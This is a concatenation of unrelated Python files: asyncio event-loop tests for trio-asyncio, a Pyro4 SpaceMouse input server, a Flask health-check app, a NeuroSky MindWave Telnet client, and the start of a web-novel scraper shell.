@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
return
# This watcher is ignored anyway. Avoid the heap of warnings.
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
def test_get_event_loop_new_process(self):
async def main():
result = await self.loop.run_in_executor(
None, _test_get_event_loop_new_process__sub_proc)
return result
try:
unpatch = self.unpatch_get_running_loop
except AttributeError:
pass
else:
unpatch()
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
if False and hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if False and hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if False and hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class TrioEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
import trio_asyncio.sync
return trio_asyncio.sync.SyncTrioEventLoop()
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
@pytest.mark.skip("Tracebacks don't look the same in trio-asynio")
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = Coro()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'Coro()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
self.assertIs(asyncio._get_running_loop(), None)
if __name__ == '__main__':
unittest.main()
|
input_server.py
|
# first to start the nameserver start: python -m Pyro4.naming
import Pyro4
from threading import Thread
import time
import numpy as np
from rlkit.launchers import config
# HOSTNAME = "192.168.0.102"
Pyro4.config.SERIALIZERS_ACCEPTED = set(['pickle','json', 'marshal', 'serpent'])
Pyro4.config.SERIALIZER='pickle'
device_state = None
@Pyro4.expose
class DeviceState(object):
state = None
def get_state(self):
return device_state
# return self.state
def set_state(self, state):
# print("set", state)
# self.state = state
global device_state
device_state = state
class SpaceMouseExpert:
def __init__(
self,
xyz_dims=3,
xyz_remap=[0, 1, 2],
xyz_scale=[1, 1, 1],
xyz_abs_threshold=0.0,
rot_dims=3,
rot_remap=[0, 1, 2],
rot_scale=[1, 1, 1],
rot_abs_threshold=0.0,
rot_discrete=False,
min_clip=-np.inf,
max_clip=np.inf
):
"""TODO: fill in other params"""
self.xyz_dims = xyz_dims
self.xyz_remap = np.array(xyz_remap)
self.xyz_scale = np.array(xyz_scale)
self.xyz_abs_threshold = xyz_abs_threshold
self.rot_dims = rot_dims
self.rot_remap = rot_remap
self.rot_scale = rot_scale
self.rot_abs_threshold = rot_abs_threshold
self.rot_discrete = rot_discrete
self.min_clip = min_clip
self.max_clip = max_clip
self.thread = Thread(target = start_server)
self.thread.daemon = True
self.thread.start()
self.device_state = DeviceState()
def get_action(self, obs):
"""Must return (action, valid, reset, accept)"""
state = self.device_state.get_state()
# time.sleep(0.1)
if state is None:
return None, False, False, False
dpos, rotation, roll, pitch, yaw, accept, reset = (
state["dpos"],
state["rotation"],
state["roll"],
state["pitch"],
state["yaw"],
state["grasp"], #["left_click"],
state["reset"], #["right_click"],
)
xyz = dpos[self.xyz_remap]
xyz[np.abs(xyz) < self.xyz_abs_threshold] = 0.0
xyz = xyz * self.xyz_scale
xyz = np.clip(xyz, self.min_clip, self.max_clip)
rot = np.array([roll, pitch, yaw])
rot[np.abs(rot) < self.rot_abs_threshold] = 0.0
if self.rot_discrete:
max_i = np.argmax(np.abs(rot))
for i in range(len(rot)):
if i != max_i:
rot[i] = 0.0
rot = rot * self.rot_scale
rot = np.clip(rot, self.min_clip, self.max_clip)
a = np.concatenate([xyz[:self.xyz_dims], rot[:self.rot_dims]])
valid = not np.all(np.isclose(a, 0))
# print(a, roll, pitch, yaw, valid)
return (a, valid, reset, accept)
def start_server():
daemon = Pyro4.Daemon(config.SPACEMOUSE_HOSTNAME)
ns = Pyro4.locateNS() # find the name server
uri = daemon.register(DeviceState) # register the greeting maker as a Pyro object
ns.register("example.greeting", uri) # register the object with a name in the name server
print("uri:", uri)
print("Server ready.")
daemon.requestLoop() # start the event loop of the server to wait for calls
if __name__ == "__main__":
expert = SpaceMouseExpert()
for i in range(100):
time.sleep(1)
print(expert.get_action(None))
|
app.py
|
from __future__ import print_function
import os
import socket
INSTANCE = os.environ.get('HOSTNAME', socket.gethostname())
DELAY = float(os.environ.get('SHUTDOWN_DELAY', 10.0))
from flask import Flask
READYRET=('OK', 200)
LIVERET=('OK', 200)
application = Flask(__name__)
@application.route('/ws/ready')
def ready():
return READYRET
@application.route('/ws/live')
def live():
return LIVERET
@application.route('/ws/setready')
def setready():
global READYRET
READYRET=('OK', 200)
return 'OK'
@application.route('/ws/setlive')
def setlive():
global LIVERET
LIVERET=('OK', 200)
return 'OK'
@application.route('/ws/unsetready')
def unsetready():
global READYRET
READYRET=('NOK', 500)
return 'OK'
@application.route('/ws/unsetlive')
def unsetlive():
global LIVERET
LIVERET=('NOK', 500)
return 'OK'
@application.route('/')
def default():
return 'Hello world!!!'+ INSTANCE
import signal
import sys
import threading
import time
import os
try:
import Queue as queue
except ImportError:
import queue
from wsgiref.simple_server import make_server
wakeup = queue.Queue()
def killer():
delay = wakeup.get()
print('sleep', delay)
time.sleep(delay)
print('killing')
# os.kill(os.getpid(), signal.SIGKILL)
os._exit(os.EX_OK)
def handler(signum, frame):
global LIVERET, READYRET
print('signal', signum)
READYRET=('NOK', 500)
LIVERET=('NOK', 500)
wakeup.put(DELAY)
if __name__ == '__main__':
signal.signal(signal.SIGTERM, handler)
thread = threading.Thread(target=killer)
thread.setDaemon(True)
thread.start()
httpd = make_server('', 8080, application)
httpd.serve_forever()
|
PyNeuro.py
|
"""
@Author Zach Wang
@Date 2021.9.27
@Version 1.2.1
"""
import json
from telnetlib import Telnet
from threading import Thread
class PyNeuro:
"""NeuroPy libraby, to get data from neurosky mindwave.
Initialising: object1=PyNeuro() #windows
After initialising , if required the callbacks must be set
then using the start method the library will start fetching data from mindwave
i.e. object1.start()
similarly close method can be called to stop fetching the data
i.e. object1.close()
requirements:Telnet
"""
__attention = 0
__meditation = 0
__blinkStrength = 0
__status = "NotConnected"
__delta = 0
__theta = 0
__lowAlpha = 0
__highAlpha = 0
__lowBeta = 0
__highBeta = 0
__lowGamma = 0
__highGamma = 0
__attention_records = []
__meditation_records = []
__blinkStrength_records = []
__packetsReceived = 0
__telnet = None
__attention_callbacks = []
__meditation_callbacks = []
__blinkStrength__callbacks = []
__delta__callbacks = []
__theta__callbacks = []
__status__callbacks = []
__lowAlpha__callbacks = []
__highAlpha__callbacks = []
__lowBeta__callbacks = []
__highBeta__callbacks = []
__lowGamma__callbacks = []
__highGamma__callbacks = []
callBacksDictionary = {} # keep a track of all callbacks
def __init__(self):
self.__parserThread = None
self.__threadRun = False
self.__connected = False
def connect(self):
"""
Connect the TCP socket via Telnet.
"""
if self.__telnet is None:
self.__telnet = Telnet('localhost', 13854)
self.__telnet.write(b'{"enableRawOutput": true, "format": "Json"}');
print("[PyNeuro] Connecting TCP Socket Host...")
def disconnect(self):
"""
Disconnect the TCP socket.
"""
if self.__telnet is not None:
self.__telnet.close()
print("[PyNeuro] Disconnect TCP Socket.")
def start(self):
"""
Start Service.
:return:
"""
self.__parserThread = Thread(target=self.__packetParser, args=())
self.__threadRun = True
self.__parserThread.start()
def close(self):
"""
Close Service.
:return:
"""
self.__threadRun = False
self.__parserThread.join()
def __packetParser(self):
try:
while True:
line = self.__telnet.read_until(b'\r');
if len(line) > 20:
try:
raw_str = (str(line).rstrip("\\r'").lstrip("b'"))
data = json.loads(raw_str)
if "status" in data.keys():
if self.__status != data["status"]:
self.__status = data["status"]
if data["status"] == "scanning":
print("[PyNeuro] Scanning device..")
else:
print("[PyNeuro] Connection lost, trying to reconnect..")
else:
if "eSense" in data.keys():
print(data["eegPower"])
if data["eSense"]["attention"] + data["eSense"]["meditation"] == 0:
if self.__status != "fitting":
self.__status = "fitting"
print("[PyNeuro] Fitting Device..")
else:
if self.__status != "connected":
self.__status = "connected"
print("[PyNeuro] Successfully Connected ..")
self.attention = data["eSense"]["attention"]
self.meditation = data["eSense"]["meditation"]
self.theta = data['eegPower']['theta']
self.delta = data['eegPower']['delta']
self.lowAlpha = data['eegPower']['lowAlpha']
self.highAlpha = data['eegPower']['highAlpha']
self.lowBeta = data['eegPower']['lowBeta']
self.highBeta = data['eegPower']['highBeta']
self.lowGamma = data['eegPower']['lowGamma']
self.highGamma = data['eegPower']['highGamma']
self.__attention_records.append(data["eSense"]["attention"])
self.__attention_records.append(data["eSense"]["meditation"])
elif "blinkStrength" in data.keys():
self.blinkStrength = data["blinkStrength"]
self.__blinkStrength_records.append(data["blinkStrength"])
except:
print()
except:
print("[PyNeuro] Stop Packet Parser")
def set_attention_callback(self, callback):
"""
Set callback function of attention value
:param callback: function(attention: int)
"""
self.__attention_callbacks.append(callback)
def set_meditation_callback(self, callback):
"""
Set callback function of meditation value
:param callback: function(meditation: int)
"""
self.__meditation_callbacks.append(callback)
def set_blinkStrength_callback(self, callback):
"""
Set callback function of blinkStrength value
:param callback: function(blinkStrength: int)
"""
self.__blinkStrength__callbacks.append(callback)
def set_delta_callback(self, callback):
self.__delta__callbacks.append(callback)
def set_theta_callback(self, callback):
self.__theta__callbacks.append(callback)
def set_lowAlpha_callback(self, callback):
self.__lowAlpha__callbacks.append(callback)
def set_highAlpha_callback(self, callback):
self.__highAlpha__callbacks.append(callback)
def set_lowBeta_callback(self, callback):
self.__lowBeta__callbacks.append(callback)
def set_highBeta_callback(self, callback):
self.__highBeta__callbacks.append(callback)
def set_lowGamma_callback(self, callback):
self.__lowGamma__callbacks.append(callback)
def set_highGamma_callback(self, callback):
self.__highGamma__callbacks.append(callback)
# attention
@property
def attention(self):
"""Get value for attention"""
return self.__attention
@attention.setter
def attention(self, value):
self.__attention = value
# if callback has been set, execute the function
if len(self.__attention_callbacks) != 0:
for callback in self.__attention_callbacks:
callback(self.__attention)
# meditation
@property
def meditation(self):
"""Get value for meditation"""
return self.__meditation
@meditation.setter
def meditation(self, value):
self.__meditation = value
# if callback has been set, execute the function
if len(self.__meditation_callbacks) != 0:
for callback in self.__meditation_callbacks:
callback(self.__meditation)
# blinkStrength
@property
def blinkStrength(self):
"""Get value for blinkStrength"""
return self.__blinkStrength
@blinkStrength.setter
def blinkStrength(self, value):
self.__blinkStrength = value
# if callback has been set, execute the function
for callback in self.__blinkStrength__callbacks:
callback(self.__blinkStrength)
@property
def delta(self):
"""Get value for delta"""
return self.__delta
@delta.setter
def delta(self, value):
self.__delta = value
# if callback has been set, execute the function
for callback in self.__delta__callbacks:
callback(self.__delta)
@property
def theta(self):
"""Get value for theta"""
return self.__theta
@theta.setter
def theta(self, value):
self.__theta = value
# if callback has been set, execute the function
for callback in self.__theta__callbacks:
callback(self.__theta)
# lowBeta
# lowAlpha
@property
def lowAlpha(self):
"""Get value for lowAlpha"""
return self.__lowAlpha
@lowAlpha.setter
def lowAlpha(self, value):
self.__lowAlpha = value
# if callback has been set, execute the function
for callback in self.__lowAlpha__callbacks:
callback(self.__lowAlpha)
# highAlpha
@property
def highAlpha(self):
"""Get value for highAlpha"""
return self.__highAlpha
@highAlpha.setter
def highAlpha(self, value):
self.__highAlpha = value
# if callback has been set, execute the function
for callback in self.__highAlpha__callbacks:
callback(self.__highAlpha)
@property
def lowBeta(self):
"""Get value for lowBeta"""
return self.__lowBeta
@lowBeta.setter
def lowBeta(self, value):
self.__lowBeta = value
# if callback has been set, execute the function
for callback in self.__lowBeta__callbacks:
callback(self.__lowBeta)
# highBeta
@property
def highBeta(self):
"""Get value for highBeta"""
return self.__highBeta
@highBeta.setter
def highBeta(self, value):
self.__highBeta = value
# if callback has been set, execute the function
for callback in self.__highBeta__callbacks:
callback(self.__highBeta)
# lowGamma
@property
def lowGamma(self):
"""Get value for lowGamma"""
return self.__lowGamma
@lowGamma.setter
def lowGamma(self, value):
self.__lowGamma = value
# if callback has been set, execute the function
for callback in self.__lowGamma__callbacks:
callback(self.__lowGamma)
# highGamma
@property
def highGamma(self):
"""Get value for midGamma"""
return self.__highGamma
@highGamma.setter
def highGamma(self, value):
self.__highGamma = value
# if callback has been set, execute the function
for callback in self.__highGamma__callbacks:
callback(self.__highGamma)
# status
@property
def status(self):
"""Get status"""
return self.__status
@status.setter
def status(self, value):
self.__status = value
for callback in self.__status__callbacks:
callback(self.__status)
|
scrapia_shell.py
|
"""
3) For missing novels, add the functionality for pausing the code while it's running and scrape those missing novels first.
4) Sometimes `panels` in the `novel page` have different names for different novels, for them, create a json file for
storing what kind of a panel they have. For that save it as "str type" and "int type" or simply hardcode that stuff...
5) Try to get the chapter no. from the current page, if it works, that should be the new value
of `BH_NO`. Why? We want to be consistent with exactly exceeding chapters being scraped and this will help in that.
7) Add an option to update webdrivers automatically, make a CLI option
check out this tool https://pypi.org/project/webdriver-manager/
"""
# scrapia_world = Scrape wuxia world...
import threading
from cmd import Cmd
from sys import exit
from traceback import print_exc
from json import dump, load
from time import sleep # for timeouts, cuz' you don't wanna get your IP banned...
from platform import system as returnOSName
from click import clear, echo, Context
from selenium.common import exceptions
from sw_utils import clrScrn, colored
from scrapia_shell_helper import ScrapiaShellHelper
if returnOSName() == "Windows":
from sw_utils import colorama
